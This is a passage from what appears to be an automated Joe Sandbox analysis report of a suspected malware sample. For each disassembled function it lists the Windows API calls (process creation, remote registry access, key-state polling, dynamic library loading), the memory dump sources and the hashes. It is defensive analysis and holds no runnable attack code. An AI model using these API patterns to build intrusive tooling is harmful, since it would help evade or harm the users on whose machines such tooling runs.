                                                                                  • Instruction Fuzzy Hash: DD217135600109AFCB10EF65D985DAEBBB8FF89704B004069FA09E7251DB74EE45DB60
                                                                                  Function 0052C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0052C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0052C84A
                                                                                    • Part of subcall function 0052C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0052C85D
                                                                                    • Part of subcall function 0052C82D: GetCurrentThreadId.KERNEL32 ref: 0052C864
                                                                                    • Part of subcall function 0052C82D: AttachThreadInput.USER32(00000000), ref: 0052C86B
                                                                                  • GetFocus.USER32 ref: 0052CA05
                                                                                    • Part of subcall function 0052C876: GetParent.USER32(?), ref: 0052C884
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0052CA4E
                                                                                  • EnumChildWindows.USER32(?,0052CAC4), ref: 0052CA76
                                                                                  • __swprintf.LIBCMT ref: 0052CA90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                  • String ID: %s%d
                                                                                  • API String ID: 3187004680-1110647743
                                                                                  • Opcode ID: 976d506577417f79d12e59f4911a17ef5e05f5bdd87348ede2b1199a41202f94
                                                                                  • Instruction ID: bb9f473e45c05d4caa6a67ca425435f9f7c8c0afc11b24cc33f053cc8df58a04
                                                                                  • Opcode Fuzzy Hash: 976d506577417f79d12e59f4911a17ef5e05f5bdd87348ede2b1199a41202f94
                                                                                  • Instruction Fuzzy Hash: 921190715002196BCB01BF60AC89FAD3F78BF96704F008066FE09AA1C3DB749945DB71
                                                                                  Function 00517A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 00517AD8
                                                                                    • Part of subcall function 00517CF4: __mtinitlocknum.LIBCMT ref: 00517D06
                                                                                    • Part of subcall function 00517CF4: EnterCriticalSection.KERNEL32(00000000,?,00517ADD,0000000D), ref: 00517D1F
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00517AE5
                                                                                  • __lock.LIBCMT ref: 00517AF9
                                                                                  • ___addlocaleref.LIBCMT ref: 00517B17
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                  • String ID: `W
                                                                                  • API String ID: 1687444384-3144318129
                                                                                  • Opcode ID: 666e0223005b2883258d15c2aa833973296cd051350199738e7c6cc41f8567c5
                                                                                  • Instruction ID: 89dfbdde21176ef649a4f364ea6a7f0409246cb7fec3db20d6609a701ec9b470
                                                                                  • Opcode Fuzzy Hash: 666e0223005b2883258d15c2aa833973296cd051350199738e7c6cc41f8567c5
                                                                                  • Instruction Fuzzy Hash: 48015B71404B059EE7209F69D90A78ABBF0FF94325F20890EA49A972A0DB74A684CB51
                                                                                  Function 0055E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0055E33D
                                                                                  • _memset.LIBCMT ref: 0055E34C
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005B3D00,005B3D44), ref: 0055E37B
                                                                                  • CloseHandle.KERNEL32 ref: 0055E38D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                  • String ID: D=[
                                                                                  • API String ID: 3277943733-511917260
                                                                                  • Opcode ID: 19bebcdd23aa2aa16ba5d38cd712ef2595c687ab4715f72e005f1d978a1b3864
                                                                                  • Instruction ID: 6bd58ee1367a379b5a6c6829ce01943193fe6bce6e26e63515205a692a1d5034
                                                                                  • Opcode Fuzzy Hash: 19bebcdd23aa2aa16ba5d38cd712ef2595c687ab4715f72e005f1d978a1b3864
                                                                                  • Instruction Fuzzy Hash: 25F054F15403047EF3501B60AC55FB77E6CEB14794F004921BE08EA1A2D3756E4466B4
                                                                                  Function 00551945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005519F3
                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00551A26
                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00551B49
                                                                                  • CloseHandle.KERNEL32(?), ref: 00551BBF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                  • String ID:
                                                                                  • API String ID: 2364364464-0
                                                                                  • Opcode ID: 8491b73b7ee4af0665f38b9d50d9bda877bdc6e70b96bafb27ea44886c39a4fa
                                                                                  • Instruction ID: ea14539da0d3e69348c7acd7e9c3bfbf935dfaeb92d48979b00b641ebbfb0f5b
                                                                                  • Opcode Fuzzy Hash: 8491b73b7ee4af0665f38b9d50d9bda877bdc6e70b96bafb27ea44886c39a4fa
                                                                                  • Instruction Fuzzy Hash: 5F818E70600205ABDF10AF64C89ABADBFF5BF48720F14845AF905AF3C2D7B4AD458B95
                                                                                  Function 0055E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0055E1D5
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0055E20D
                                                                                  • IsDlgButtonChecked.USER32(?,00000001), ref: 0055E248
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0055E269
                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0055E281
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3188977179-0
                                                                                  • Opcode ID: 3b118d613e5227c22350d1ece7158532a2251d6d0069141326758f6964f111fe
                                                                                  • Instruction ID: 8e0d5edcb37858d041117d8a850e821cba7a4588aafccaa89fbf462e0f861e85
                                                                                  • Opcode Fuzzy Hash: 3b118d613e5227c22350d1ece7158532a2251d6d0069141326758f6964f111fe
                                                                                  • Instruction Fuzzy Hash: 8C61A534600604AFDB28CF54C866FBA7FBAFF89301F14405AFD599B2A1C771AA48DB50
                                                                                  Function 00531C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 00531CB4
                                                                                  • VariantClear.OLEAUT32(00000013), ref: 00531D26
                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00531D81
                                                                                  • VariantClear.OLEAUT32(?), ref: 00531DF8
                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00531E26
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                                  • String ID:
                                                                                  • API String ID: 4136290138-0
                                                                                  • Opcode ID: 2029499f59ddff632af655e72240836c96f8b3038b9d67b8aa6f7a2cda02f7aa
                                                                                  • Instruction ID: f95f7bb60b57662838780550da97ec01d4b0a8bdc7f56656cd5e13c5213a0e25
                                                                                  • Opcode Fuzzy Hash: 2029499f59ddff632af655e72240836c96f8b3038b9d67b8aa6f7a2cda02f7aa
                                                                                  • Instruction Fuzzy Hash: A5514AB5A00209AFDB14CF68C880AAABBB9FF4D314F158559E959DB301E730E951CFA4
                                                                                  Function 00550688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 005506EE
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0055077D
                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0055079B
                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005507E1
                                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 005507FB
                                                                                    • Part of subcall function 0050E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0053A574,?,?,00000000,00000008), ref: 0050E675
                                                                                    • Part of subcall function 0050E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0053A574,?,?,00000000,00000008), ref: 0050E699
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 327935632-0
                                                                                  • Opcode ID: 49b079f1414a3d9b55a30dd1abdc5d14ff8bf1676cc7468025c49c9a42b13aad
                                                                                  • Instruction ID: c745f050c289add53d832bc4a713d598639f9418eb2bc4feb7c042b7372b2476
                                                                                  • Opcode Fuzzy Hash: 49b079f1414a3d9b55a30dd1abdc5d14ff8bf1676cc7468025c49c9a42b13aad
                                                                                  • Instruction Fuzzy Hash: 1B517B75A00209DFCB00EFA8D495DADBBB5FF58314B14805AEA05AB392DB34ED49CF94
                                                                                  Function 00552E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00553C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00552BB5,?,?), ref: 00553C1D
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00552EEF
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00552F2E
                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00552F75
                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00552FA1
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00552FAE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                  • String ID:
                                                                                  • API String ID: 3740051246-0
                                                                                  • Opcode ID: 04ffa802f9ded7c75465e696096cea8e0d5d38241b60a0bf0458284e9554f4aa
                                                                                  • Instruction ID: b98f273dd1b81d69e7435fa3eee027d72d2fb0d8853277959eb5216bb3881766
                                                                                  • Opcode Fuzzy Hash: 04ffa802f9ded7c75465e696096cea8e0d5d38241b60a0bf0458284e9554f4aa
                                                                                  • Instruction Fuzzy Hash: 57515D71208208AFD704EF54D896E6EBBF9FF88304F00485EF95597291DB34E908DB52
                                                                                  Function 00541206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005412B4
                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 005412DD
                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0054131C
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00541341
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00541349
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1389676194-0
                                                                                  • Opcode ID: 1fab9e10f2f88a02e88f214fe6d38057978c90fd1690a29d3c0b264db231f7d3
                                                                                  • Instruction ID: 5644fa28d69cc894ea34262e82b15d81a857590e33a5b63e7bbd596234e8e911
                                                                                  • Opcode Fuzzy Hash: 1fab9e10f2f88a02e88f214fe6d38057978c90fd1690a29d3c0b264db231f7d3
                                                                                  • Instruction Fuzzy Hash: EC413B35A00509DFCF01EF65C985AAEBBF5FF48314B148099E90AAB3A2CB35ED41DB54
                                                                                  Function 0050B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCursorPos.USER32(000000FF), ref: 0050B64F
                                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 0050B66C
                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 0050B691
                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 0050B69F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                  • String ID:
                                                                                  • API String ID: 4210589936-0
                                                                                  • Opcode ID: bd7eb03bb8307f24e6898b136cd3b95b8c4a84a51af96fec24045bdaeb9f9bef
                                                                                  • Instruction ID: 239ff4a9b1ff6e8e1bfa63ea954921d44183ee89d297a4ce947cce3c46bbb85d
                                                                                  • Opcode Fuzzy Hash: bd7eb03bb8307f24e6898b136cd3b95b8c4a84a51af96fec24045bdaeb9f9bef
                                                                                  • Instruction Fuzzy Hash: A9413035A04115BBDF159F64C888AEDFF74BF45324F10471AE829A72D0CB31A994EFA1
                                                                                  Function 0052B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowRect.USER32(?,?), ref: 0052B369
                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 0052B413
                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0052B41B
                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 0052B429
                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0052B431
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3382505437-0
                                                                                  • Opcode ID: eca4b367ced71f59c01e53c0b4cd19bd5797d17debd728ccb84178c94824a657
                                                                                  • Instruction ID: 178272508c8ba43b5208e3ace5c3105094ff50123b8d510370a7e1fd428883d6
                                                                                  • Opcode Fuzzy Hash: eca4b367ced71f59c01e53c0b4cd19bd5797d17debd728ccb84178c94824a657
                                                                                  • Instruction Fuzzy Hash: 1031AD71900229EBEF04CF68E989A9E3BB5FF15325F104629F825A61D1C3B09954DB90
                                                                                  Function 0052DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 0052DBD7
                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0052DBF4
                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0052DC2C
                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0052DC52
                                                                                  • _wcsstr.LIBCMT ref: 0052DC5C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                  • String ID:
                                                                                  • API String ID: 3902887630-0
                                                                                  • Opcode ID: 8b0123f005657d3be16551dd13d0f11f857b14a0f9a1a809170312af3124dbb7
                                                                                  • Instruction ID: 529f67d9976eb2c3da5f3f10879bda9b7b495e41047443fce1d62facaef1dd41
                                                                                  • Opcode Fuzzy Hash: 8b0123f005657d3be16551dd13d0f11f857b14a0f9a1a809170312af3124dbb7
                                                                                  • Instruction Fuzzy Hash: 6021C871204114ABEB155F35AC49E7F7FB8FF46760F104029F809EA1D1DAA1DC41A7B0
                                                                                  Function 0055DE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0055DEB0
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0055DED4
                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0055DEEC
                                                                                  • GetSystemMetrics.USER32(00000004), ref: 0055DF14
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00543A1E,00000000), ref: 0055DF32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                  • String ID:
                                                                                  • API String ID: 2294984445-0
                                                                                  • Opcode ID: c281f47887277f85cd26f486f220e3737f6d23b4d4ba06db0c890251816c9975
                                                                                  • Instruction ID: 8fb8713f82b7b327f4a59061df03c1fa5979de57981dd128fc6e97180367bde2
                                                                                  • Opcode Fuzzy Hash: c281f47887277f85cd26f486f220e3737f6d23b4d4ba06db0c890251816c9975
                                                                                  • Instruction Fuzzy Hash: 7321E5726102129FCB304F78DC58B6A7BB8FF25326F150726BC26CA5E0D7309858D7A0
                                                                                  Function 0052BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0052BC90
                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0052BCC2
                                                                                  • __itow.LIBCMT ref: 0052BCDA
                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0052BD00
                                                                                  • __itow.LIBCMT ref: 0052BD11
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
